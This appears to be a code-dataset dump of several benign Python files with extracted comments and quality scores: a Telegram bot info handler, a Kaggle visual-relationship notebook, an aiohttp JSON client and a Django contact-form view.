from telegram import Update from telegram.ext import Dispatcher, CommandHandler, MessageHandler, Filters, ConversationHandler, CallbackContext from course_mgr.course_info import CourseInfo class InfoHandler(): def __init__(self, info:CourseInfo): self.information = info self.handler = CommandHandler('info', self.info) def get_handler(self) -> Dispatcher: return self.handler def get_help(self): return f"/info: 수업 관련 정보를 확인할 수 있습니다." def cancel(self, update: Update, context: CallbackContext) -> None: """Display the gathered info and end the conversation.""" update.message.reply_text("취소 되었습니다.") context.user_data.clear() def info(self, update: Update, context: CallbackContext) -> None: text = self.information.get_text() update.message.reply_text(text)
from telegram import Update from telegram.ext import Dispatcher, CommandHandler, MessageHandler, Filters, ConversationHandler, CallbackContext from course_mgr.course_info import CourseInfo class InfoHandler(): def __init__(self, info:CourseInfo): self.information = info self.handler = CommandHandler('info', self.info) def get_handler(self) -> Dispatcher: return self.handler def get_help(self): return f"/info: 수업 관련 정보를 확인할 수 있습니다." def cancel(self, update: Update, context: CallbackContext) -> None: """Display the gathered info and end the conversation.""" update.message.reply_text("취소 되었습니다.") context.user_data.clear() def info(self, update: Update, context: CallbackContext) -> None: text = self.information.get_text() update.message.reply_text(text)
en
0.763833
Display the gathered info and end the conversation.
2.486872
2
notebooks/featured-70/fork-of-explore-a-bit.py
anonymous-authorss/DS-Pipeline
0
6618648
# coding: utf-8 # In[ ]: # This Python 3 environment comes with many helpful analytics libraries installed # It is defined by the kaggle/python docker image: https://github.com/kaggle/docker-python # For example, here's several helpful packages to load in import numpy as np # linear algebra import pandas as pd # data processing, CSV file I/O (e.g. pd.read_csv) # Input data files are available in the "../input/" directory. # For example, running this (by clicking run or pressing Shift+Enter) will list the files in the input directory import os print(os.listdir("../input")) # Any results you write to the current directory are saved as output. # In[ ]: import matplotlib.pyplot as plt import matplotlib.image as mpimg import numpy as np FOLDER = "../input/google-ai-open-images-visual-relationship-track/test/challenge2018_test" image_filenames = os.listdir(FOLDER) fig = plt.figure(figsize=(12,12)) # In[ ]: N_IMAGES = 10 import random for i in range(N_IMAGES): path = FOLDER + "/" + image_filenames[i] img = mpimg.imread(path) plt.imshow(img[:,:,::-1], aspect='auto') plt.show() # # Train Data - What is there? 
# In[ ]: train_fol = "../input/challenge-2018-train-image-relationship/challenge-2018-train-vrd.csv" import pandas as pd import numpy as np df = pd.read_csv(train_fol) # Relationships relationship = df.RelationshipLabel.value_counts() print(relationship) # In[ ]: df[df.ImageID == '00379950569d024c'] # # So, mostly relationship is 'is' # In[ ]: # Object 1 Label lab_name1 = df.LabelName1.value_counts() print(lab_name1) # # So mostly label 1 is '/m/01mzpv' (Chair, next is Man) # In[ ]: lab_name2 = df.LabelName2.value_counts() print(lab_name2) # # Mostly Label2 is '/m/083vt' # In[ ]: # Combined Triplet df['triplet'] = df['LabelName1'] + ' ' + df['RelationshipLabel'] + ' ' + df['LabelName2'] print(df.triplet.value_counts()) # In[ ]: del df['triplet'] df.describe() # # Lets take the MEAN and use it for all prediction # In[ ]: means = [0.373899, 0.624713, 0.426304, 0.785764, 0.333565, 0.666269, 0.500565, 0.807825] sub = pd.DataFrame(columns=df.columns) N = len(image_filenames) sub['ImageID'] = image_filenames sub['LabelName1'] = ['/m/01mzpv']*N sub['LabelName2'] = ['/m/04bcr3']*N cols = df.columns for i in range(3,len(cols)-1): col = cols[i] sub[col] = [means[i-3]]*N sub['RelationshipLabel'] = ['is']*N def get_pred(df): pred = '0.500000' pred = pred + ' ' + df['LabelName1'] + ' ' + str(df[cols[3]]) + ' ' + str(df[cols[5]]) + ' ' + str(df[cols[4]]) + ' ' + str(df[cols[6]]) + ' '+ df['LabelName2'] + ' ' + str(df[cols[7]]) + ' ' + str(df[cols[9]]) + ' ' + str(df[cols[8]]) + ' ' + str(df[cols[10]]) pred += ' ' + df['RelationshipLabel'] return pred sub['PredictionString'] = sub.apply(get_pred, axis=1) final = pd.DataFrame() def remove_jpg_ext(v): return v[:-4] final['ImageId'] = sub['ImageID'].apply(remove_jpg_ext) final['PredictionString'] = sub['PredictionString'] # In[ ]: # sample_file = "../input/VRD_sample_submission.csv" # import pandas as pd # sample = pd.read_csv(sample_file) # sample.head() # In[ ]: # In[ ]: print(final.head()) 
final.to_csv('submission_final_chair_at_table.csv', index=False)
# coding: utf-8 # In[ ]: # This Python 3 environment comes with many helpful analytics libraries installed # It is defined by the kaggle/python docker image: https://github.com/kaggle/docker-python # For example, here's several helpful packages to load in import numpy as np # linear algebra import pandas as pd # data processing, CSV file I/O (e.g. pd.read_csv) # Input data files are available in the "../input/" directory. # For example, running this (by clicking run or pressing Shift+Enter) will list the files in the input directory import os print(os.listdir("../input")) # Any results you write to the current directory are saved as output. # In[ ]: import matplotlib.pyplot as plt import matplotlib.image as mpimg import numpy as np FOLDER = "../input/google-ai-open-images-visual-relationship-track/test/challenge2018_test" image_filenames = os.listdir(FOLDER) fig = plt.figure(figsize=(12,12)) # In[ ]: N_IMAGES = 10 import random for i in range(N_IMAGES): path = FOLDER + "/" + image_filenames[i] img = mpimg.imread(path) plt.imshow(img[:,:,::-1], aspect='auto') plt.show() # # Train Data - What is there? 
# Explore the training relationship annotations, then build a constant
# "chair at table" submission for every test image.
train_fol = "../input/challenge-2018-train-image-relationship/challenge-2018-train-vrd.csv"

import pandas as pd
import numpy as np

df = pd.read_csv(train_fol)

# Relationship label frequencies -- 'is' is by far the most common.
relationship = df.RelationshipLabel.value_counts()
print(relationship)

# Peek at the annotations of one image (display-only in a notebook).
df[df.ImageID == '00379950569d024c']

# First object label frequencies ('/m/01mzpv' = Chair leads, then Man).
lab_name1 = df.LabelName1.value_counts()
print(lab_name1)

# Second object label frequencies ('/m/083vt' leads).
lab_name2 = df.LabelName2.value_counts()
print(lab_name2)

# Most frequent full (label1, relationship, label2) triplets.
df['triplet'] = df['LabelName1'] + ' ' + df['RelationshipLabel'] + ' ' + df['LabelName2']
print(df.triplet.value_counts())
del df['triplet']
df.describe()

# Column means of the eight bounding-box coordinates (from df.describe());
# every test image gets these same constant boxes.
means = [0.373899, 0.624713, 0.426304, 0.785764,
         0.333565, 0.666269, 0.500565, 0.807825]

sub = pd.DataFrame(columns=df.columns)
N = len(image_filenames)  # produced by the image-listing cell earlier
sub['ImageID'] = image_filenames
sub['LabelName1'] = ['/m/01mzpv'] * N  # Chair
sub['LabelName2'] = ['/m/04bcr3'] * N  # Table
cols = df.columns
for idx in range(3, len(cols) - 1):
    # Columns 3..10 hold the box coordinates; fill each with its mean.
    sub[cols[idx]] = [means[idx - 3]] * N
sub['RelationshipLabel'] = ['is'] * N


def get_pred(df):
    """Assemble the space-separated PredictionString for one submission row."""
    fields = [
        '0.500000',
        df['LabelName1'],
        str(df[cols[3]]), str(df[cols[5]]), str(df[cols[4]]), str(df[cols[6]]),
        df['LabelName2'],
        str(df[cols[7]]), str(df[cols[9]]), str(df[cols[8]]), str(df[cols[10]]),
        df['RelationshipLabel'],
    ]
    return ' '.join(fields)


sub['PredictionString'] = sub.apply(get_pred, axis=1)


def remove_jpg_ext(v):
    """Chop the trailing 4-character '.jpg' extension off a filename."""
    return v[:-4]


final = pd.DataFrame()
final['ImageId'] = sub['ImageID'].apply(remove_jpg_ext)
final['PredictionString'] = sub['PredictionString']

print(final.head())
final.to_csv('submission_final_chair_at_table.csv', index=False)
en
0.831532
# coding: utf-8 # In[ ]: # This Python 3 environment comes with many helpful analytics libraries installed # It is defined by the kaggle/python docker image: https://github.com/kaggle/docker-python # For example, here are several helpful packages to load in # linear algebra # data processing, CSV file I/O (e.g. pd.read_csv) # Input data files are available in the "../input/" directory. # For example, running this (by clicking run or pressing Shift+Enter) will list the files in the input directory # Any results you write to the current directory are saved as output. # In[ ]: # In[ ]: # # Train Data - What is there? # In[ ]: # Relationships # In[ ]: # # So, mostly relationship is 'is' # In[ ]: # Object 1 Label # # So mostly label 1 is '/m/01mzpv' (Chair, next is Man) # In[ ]: # # Mostly Label2 is '/m/083vt' # In[ ]: # Combined Triplet # In[ ]: # # Let's take the MEAN and use it for all prediction # In[ ]: # In[ ]: # sample_file = "../input/VRD_sample_submission.csv" # import pandas as pd # sample = pd.read_csv(sample_file) # sample.head() # In[ ]: # In[ ]:
2.775509
3
waio/client/http.py
dotX12/waio
24
6618649
<reponame>dotX12/waio<filename>waio/client/http.py import aiohttp import ujson from urllib.parse import unquote from typing import Optional, Union, Dict, Any, List, Tuple from aiohttp import ContentTypeError from waio.client.exceptions import FailedDecodeJson class HTTPClient: async def request( self, method: str, url: str, headers: Optional[Dict[str, Any]] = None, **kwargs, ) -> Tuple[Dict[str, Any], int]: if not headers: headers = {} async with aiohttp.ClientSession(headers=headers) as session: async with session.request(method=method, url=url, **kwargs) as resp: return await self.generate_json_from_response(resp) async def generate_json_from_response( self, resp: aiohttp.ClientResponse ) -> Tuple[Dict[str, Any], int]: content_type = resp.headers.get('Content-Type') try: if content_type == 'text/plain': resp_text = await resp.text() resp_json = ujson.loads(resp_text) return self.decode_json(resp_json), resp.status elif content_type == 'application/json': resp_json = await resp.json() return resp_json, resp.status except ContentTypeError as e: raise FailedDecodeJson(f"Check args, URL is invalid - {e}") @staticmethod def decode_json(data: Union[List, Dict[str, Any]]): data_dumps = ujson.dumps(data, ensure_ascii=False) decoded_data_str = unquote(data_dumps) data_data_json = ujson.loads(decoded_data_str) return data_data_json @staticmethod def prepare_url(base_url: str, url: str, **kwargs): url = f"{base_url}/{url.format(**kwargs)}" return url
import aiohttp import ujson from urllib.parse import unquote from typing import Optional, Union, Dict, Any, List, Tuple from aiohttp import ContentTypeError from waio.client.exceptions import FailedDecodeJson class HTTPClient: async def request( self, method: str, url: str, headers: Optional[Dict[str, Any]] = None, **kwargs, ) -> Tuple[Dict[str, Any], int]: if not headers: headers = {} async with aiohttp.ClientSession(headers=headers) as session: async with session.request(method=method, url=url, **kwargs) as resp: return await self.generate_json_from_response(resp) async def generate_json_from_response( self, resp: aiohttp.ClientResponse ) -> Tuple[Dict[str, Any], int]: content_type = resp.headers.get('Content-Type') try: if content_type == 'text/plain': resp_text = await resp.text() resp_json = ujson.loads(resp_text) return self.decode_json(resp_json), resp.status elif content_type == 'application/json': resp_json = await resp.json() return resp_json, resp.status except ContentTypeError as e: raise FailedDecodeJson(f"Check args, URL is invalid - {e}") @staticmethod def decode_json(data: Union[List, Dict[str, Any]]): data_dumps = ujson.dumps(data, ensure_ascii=False) decoded_data_str = unquote(data_dumps) data_data_json = ujson.loads(decoded_data_str) return data_data_json @staticmethod def prepare_url(base_url: str, url: str, **kwargs): url = f"{base_url}/{url.format(**kwargs)}" return url
none
1
2.474092
2
lfs_contact/views.py
diefenbach/lfs-contact
2
6618650
from django.http import HttpResponseRedirect from django.shortcuts import render from django.urls import reverse from django.utils.translation import ugettext as _ from lfs.catalog.models import Product import lfs.customer.utils from lfs_contact.forms import ContactForm from lfs_contact.utils import send_contact_mail def contact_form(request, contact_form=ContactForm, template_name="lfs/contact/contact_form.html"): """Displays the contact form of LFS. """ if request.method == 'POST': form = contact_form(data=request.POST) if form.is_valid(): send_contact_mail(request, form) return HttpResponseRedirect(reverse("lfs_contact_form_sent")) else: customer = lfs.customer.utils.get_customer(request) product_id = request.GET.get('product_id', None) subject = '' try: name = customer.address.firstname + " " + customer.address.lastname email = customer.address.email except AttributeError: name = "" email = "" if product_id: try: product = Product.objects.get(pk=product_id, active=True) except Product.DoesNotExist: pass else: sku = product.get_sku() if sku: sku = ' (%s)' % sku subject = _('Availability of \'%(product_name)s\'%(sku)s') % dict(product_name=product.get_name(), sku=sku) form = contact_form(initial={"name": name, "email": email, 'subject': subject}) return render(request, template_name, { "form": form, }) def contact_form_sent(request, template_name="lfs/contact/contact_form_sent.html"): """Displays the page after the the contact form has been sent. """ return render(request, template_name, {})
from django.http import HttpResponseRedirect from django.shortcuts import render from django.urls import reverse from django.utils.translation import ugettext as _ from lfs.catalog.models import Product import lfs.customer.utils from lfs_contact.forms import ContactForm from lfs_contact.utils import send_contact_mail def contact_form(request, contact_form=ContactForm, template_name="lfs/contact/contact_form.html"): """Displays the contact form of LFS. """ if request.method == 'POST': form = contact_form(data=request.POST) if form.is_valid(): send_contact_mail(request, form) return HttpResponseRedirect(reverse("lfs_contact_form_sent")) else: customer = lfs.customer.utils.get_customer(request) product_id = request.GET.get('product_id', None) subject = '' try: name = customer.address.firstname + " " + customer.address.lastname email = customer.address.email except AttributeError: name = "" email = "" if product_id: try: product = Product.objects.get(pk=product_id, active=True) except Product.DoesNotExist: pass else: sku = product.get_sku() if sku: sku = ' (%s)' % sku subject = _('Availability of \'%(product_name)s\'%(sku)s') % dict(product_name=product.get_name(), sku=sku) form = contact_form(initial={"name": name, "email": email, 'subject': subject}) return render(request, template_name, { "form": form, }) def contact_form_sent(request, template_name="lfs/contact/contact_form_sent.html"): """Displays the page after the the contact form has been sent. """ return render(request, template_name, {})
en
0.932835
Displays the contact form of LFS. Displays the page after the contact form has been sent.
2.208923
2